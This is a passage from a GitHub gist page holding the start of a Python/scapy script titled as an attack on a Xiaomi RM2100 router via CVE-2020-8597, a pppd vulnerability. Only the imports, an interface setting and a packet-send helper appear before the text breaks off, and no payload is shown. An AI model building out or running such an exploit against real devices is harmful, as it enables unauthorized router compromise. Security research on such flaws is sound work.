Skip to content

Instantly share code, notes, and snippets.

View kralizeck's full-sized avatar

kralizeck

  • Málaga ‹~ España ‹~ Europa ‹~ Tierra ‹~ Universo
View GitHub Profile
@kralizeck
kralizeck / pppd-cve.py
Created October 11, 2020 09:26 — forked from namidairo/pppd-cve.py
Xiaomi RM2100 1.0.14 vs. CVE-2020-8597
from scapy.all import *
from socket import *
interface = "enp0s31f6"
def mysend(pay,interface = interface):
sendp(pay, iface = interface)
def packet_callback(packet):